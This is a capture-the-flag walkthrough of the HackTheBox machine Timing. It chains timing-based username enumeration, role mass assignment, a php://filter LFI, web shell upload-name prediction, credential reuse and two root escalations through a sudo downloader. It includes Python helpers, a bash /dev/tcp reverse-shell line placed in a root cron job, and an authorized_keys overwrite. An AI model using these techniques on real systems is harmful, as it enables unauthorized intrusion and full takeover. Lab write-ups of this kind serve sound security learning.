Timing is a medium-rated machine on HackTheBox created by irogir. For the user part, we will first abuse a timing attack on the login functionality of a web application. Once logged in, we are able to assign ourselves administrative privileges and abuse an LFI to review the source code of the application, which lets us eventually upload a web shell. Using the web shell, we find a backup that contains the password of a user who can log in via SSH. This user is able to run a custom Java application as root, and we will look at two different ways to abuse this and capture the root flag.

User

As usual, we start our enumeration with an nmap scan against all ports, followed by a script and version detection scan against the open ones to get an initial overview of the attack surface.

Nmap

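nmap does the real work here. To illustrate what the first "all ports" pass does, a full TCP connect scan can be sketched in a few lines of Python. It is not a replacement for nmap's SYN scan, version detection or scripts, and the timeout and worker count are arbitrary assumptions.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a full TCP handshake to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, ...
        return False


def connect_scan(host: str, ports=range(1, 65536), workers: int = 200) -> list[int]:
    """Probe every port concurrently and return the open ones in input order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda port: (port, is_open(host, port)), ports)
        return [port for port, is_up in results if is_up]
```

With the default range, `connect_scan(target_ip)` walks all 65535 TCP ports. The open ones would then be handed to a targeted `nmap -sC -sV` run.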

User enumeration





Of the two open ports, HTTP seems more promising. Opening the page in our browser, we get redirected to the login page of Simple WebApp.





Playing around with the login in Burp, we notice a noticeable time difference when we enter admin as the username compared to other usernames. If this holds true for every valid username, we might be able to enumerate users of the application this way.

Using patator, we find another valid username: aaron.

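The enumeration itself was done with patator. The underlying idea can be sketched in Python: time several failed logins per candidate and compare the median against a username that almost certainly does not exist. The `login` callable is a hypothetical hook (in practice, a POST to the login form with an HTTP client). The baseline username, sample count and `min_delta` threshold are assumptions that need tuning against the real network latency.

```python
import statistics
import time
from typing import Callable, Iterable

# Hypothetical hook: send one login attempt and return once the response has arrived.
LoginFn = Callable[[str, str], object]


def response_time(login: LoginFn, username: str, samples: int = 5) -> float:
    """Median duration of `samples` failed logins for one username."""
    durations = []
    for _ in range(samples):
        start = time.perf_counter()
        login(username, "invalid-password")  # the password only has to be wrong
        durations.append(time.perf_counter() - start)
    return statistics.median(durations)


def enumerate_users(login: LoginFn, candidates: Iterable[str],
                    baseline_user: str = "no-such-user-xyz",
                    min_delta: float = 0.1, samples: int = 5) -> list[str]:
    """Flag usernames whose median response time exceeds the baseline by min_delta seconds."""
    baseline = response_time(login, baseline_user, samples)
    return [user for user in candidates
            if response_time(login, user, samples) - baseline > min_delta]
```

Taking the median of a few samples rather than a single measurement makes one slow network round trip far less likely to produce a false positive.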

Trying the username as the password as well, we are able to log into the application.

Access control



We now have access to the Edit Profile feature on the website.



To take a closer look, we intercept the request and send it to Burp Repeater. The response contains a JSON object with more parameters than the form sets.



Next, we test whether we can also set the role parameter, which is not part of the form, and the update succeeds.
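The reasoning behind this test is a mass-assignment check. Any key that the JSON response returns but the form never sends is a candidate, and we simply append it to the request body. In the sketch below, all field names and the role value `"1"` are hypothetical placeholders. The real ones are the ones visible in Burp.

```python
import json
from urllib.parse import urlencode


def unexposed_fields(sent: dict[str, str], response_body: str) -> set[str]:
    """Keys present in the JSON response that the form never sends (mass-assignment candidates)."""
    return set(json.loads(response_body)) - set(sent)


def build_update(sent: dict[str, str], extra: dict[str, str]) -> str:
    """URL-encode the original form fields plus the extra ones we want the server to accept."""
    return urlencode({**sent, **extra})
```

For example, a form sending `firstName` and `lastName` whose response also returns `id` and `role` yields `{"id", "role"}` as candidates. `build_update(form, {"role": "1"})` then produces the body to replay in Repeater.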

Webshell

Refreshing the page we now have access to the Admin panel.



Looking at the JavaScript file handling the upload functionality, we find an interesting-looking path.

When we test whether we can include other files, ../ seems to be blocked by a WAF, but we succeed using the php:// wrapper.

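We assume the wrapper used here is the common `php://filter/convert.base64-encode/resource=...` variant. It makes the include return a file's source as base64 instead of executing it, and the payload contains no `../` for the WAF to match. The sketch below builds such a URL and decodes the result. The host `target` and the parameter name `img` are hypothetical placeholders, and only image.php comes from this box.

```python
import base64
from urllib.parse import urlencode


def filter_url(endpoint: str, param: str, target: str) -> str:
    """Build an include URL that makes PHP return `target` base64-encoded instead of executing it."""
    wrapper = f"php://filter/convert.base64-encode/resource={target}"
    return f"{endpoint}?{urlencode({param: wrapper})}"


def decode_source(response_text: str) -> str:
    """Decode the base64 blob that the filter wrapper returns."""
    return base64.b64decode(response_text.strip()).decode(errors="replace")
```

For example, `filter_url("http://target/image.php", "img", "upload.php")` yields a URL whose response, passed through `decode_source`, is the PHP source of upload.php.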

Looking at the source code of image.php itself, we see how the blacklist is implemented. Another interesting detail is that, if the input passes the blacklist, include is called on the file. This means any PHP code between <?php ... ?> tags will be executed regardless of the file extension.


Now we just need to know where the file gets uploaded. This is handled in upload.php, so we take a close look at it as well.


At first this looks like more brute-force work than it actually is. Because $file_hash is inside single quotes, PHP does not interpolate it, so it is just the string literal '$file_hash'. This literal is concatenated with the current time and hashed, and _ plus the filename are appended to the result.




Uploading a simple PHP reverse shell with the .jpg extension, we can see the server time, which we need, in the response in Repeater.

Next, we just have to take the MD5 sum of the string $file_hash concatenated with the server time in epoch format, then append _ and the filename.

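The calculation can be sketched in Python. It assumes the PHP expression is `md5('$file_hash' . time()) . '_' . <uploaded filename>`, as described above, and that the server time is read from the response's HTTP `Date` header. Because the upload and the response may not fall in the same second, the sketch also generates names for a small window around that time. The window size is an assumption. The upload directory is not shown here, so only bare filenames are produced.

```python
import hashlib
from email.utils import parsedate_to_datetime


def upload_name(epoch: int, filename: str) -> str:
    """md5('$file_hash' . time()) . '_' . filename"""
    # Single quotes in PHP: the literal text "$file_hash" is hashed, not a variable's value.
    digest = hashlib.md5(f"$file_hash{epoch}".encode()).hexdigest()
    return f"{digest}_{filename}"


def date_to_epoch(date_header: str) -> int:
    """Convert an HTTP Date header (e.g. from the upload response) to Unix epoch seconds."""
    return int(parsedate_to_datetime(date_header).timestamp())


def candidate_names(date_header: str, filename: str, window: int = 2) -> list[str]:
    """Names for every second within +/- window of the server time."""
    epoch = date_to_epoch(date_header)
    return [upload_name(epoch + offset, filename) for offset in range(-window, window + 1)]
```

Each candidate can then be requested in turn (with curl or any HTTP client) until one of them returns the uploaded file.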

Using curl, we confirm that the file exists and that we have remote code execution on the target.


Credential reuse

There seems to be a firewall on the target that blocks outbound connections as www-data. However, after looking around, we quickly find an interesting backup in /opt/.


After transferring and unzipping the backup on our machine, we see that it contains a git repository.


There are only two commits in the repo. Diffing them, we find another database password.


Testing the older password for the previously found user aaron against SSH, we are able to log into the machine and grab the user flag.


Root

Netutils

Checking for sudo permissions we see that aaron is allowed to run /usr/bin/netutils, which is a bash script that runs a jar located in root’s home directory.


Running it, we can choose between FTP and HTTP. Choosing HTTP prompts us to enter a URL.


To test it, we first create a file with a distinctive name and content so that we can find it again later in case it gets placed somewhere else.


We serve the file using Python and enter the URL.

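Both preparation steps can be sketched in Python. The marker file shares a random token between its name and its content, so it can be located later (for example with `find / -name 'marker-*'`). The server is the programmatic equivalent of `python3 -m http.server`. The `marker-` prefix and the default port 8000 are arbitrary choices for this sketch.

```python
import functools
import http.server
import threading
import uuid
from pathlib import Path


def make_marker(directory: Path) -> Path:
    """Create a file whose name and content share a random token, so it is easy to find later."""
    token = uuid.uuid4().hex
    marker = directory / f"marker-{token}"
    marker.write_text(token + "\n")
    return marker


def serve(directory: Path, port: int = 8000) -> http.server.ThreadingHTTPServer:
    """Serve `directory` over HTTP from a background thread (like python3 -m http.server)."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=str(directory))
    server = http.server.ThreadingHTTPServer(("0.0.0.0", port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

The URL entered into netutils would then be `http://<our IP>:8000/<marker name>`.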

The file is downloaded into our current working directory and is owned by root.


Cronjob

One way to abuse this is the fact that we can write files as the root user into any directory we are able to cd into. Getting root from here is as simple as creating a cronjob file named legit on our machine that sends a reverse shell back to us.

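A file in /etc/cron.d holds one job per line: five time fields, the user to run as, then the command. The sketch below builds such a line. It uses a common bash `/dev/tcp` reverse shell, which is not necessarily the author's exact payload, and wraps it in `bash -c` because cron runs commands with `/bin/sh`. It also checks the filename, since Debian-style cron only reads /etc/cron.d files named with letters, digits, underscores and hyphens (a name like legit qualifies). The IP address and port in the usage note are hypothetical.

```python
import re

# Debian-style cron skips /etc/cron.d files whose names contain anything else (e.g. a dot).
CRON_D_NAME = re.compile(r"[A-Za-z0-9_-]+")


def reverse_shell(lhost: str, lport: int) -> str:
    """Bash /dev/tcp reverse shell; lhost/lport point at our listener."""
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


def cron_d_entry(command: str, user: str = "root", schedule: str = "* * * * *") -> str:
    """One /etc/cron.d line: schedule, user, command.

    cron may treat a last line without a trailing newline as broken, so one is always added.
    """
    return f"{schedule} {user} {command}\n"


def valid_cron_d_name(name: str) -> bool:
    return CRON_D_NAME.fullmatch(name) is not None
```

For example, `cron_d_entry(reverse_shell("10.10.14.2", 4444))` produces a job that runs every minute as root. Because netutils downloads the file as root, it also satisfies cron's requirement that files in /etc/cron.d be owned by root.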

Now we just have to set up our listener.


We cd into /etc/cron.d/ and download the cronjob using /usr/bin/netutils.


About a minute later, we get a connection on our listener as the root user.


Axelrc

Checking the user agent of the downloader, we see that it is User-Agent: Axel/2.16.1 (Linux). Another way to abuse this is the .axelrc configuration file, in which we can specify a default filename for downloaded files. This applies when the URL does not contain a filename. First, we create a .axelrc in aaron’s home directory.

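The configuration needed is a single line. The sketch below writes it from Python and assumes Axel's `default_filename` option, the setting that names downloads whose URL has no filename. The target path is the one this attack aims for. In practice, a one-line `echo` into `~/.axelrc` does the same job.

```python
from pathlib import Path


def write_axelrc(home: Path, default_filename: str) -> Path:
    """Write ~/.axelrc so downloads without a filename in the URL are saved to default_filename."""
    rc = home / ".axelrc"
    rc.write_text(f"default_filename = {default_filename}\n")
    return rc
```

Calling `write_axelrc(Path.home(), "/root/.ssh/authorized_keys")` as aaron prepares the download that follows.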

Then we create an SSH key pair and move the public key to index.html.


Next, we serve the public key with a Python web server and start the download using a URL without a file path.


This leads to index.html getting downloaded and saved as /root/.ssh/authorized_keys.


Now we can simply ssh into the machine as the root user.
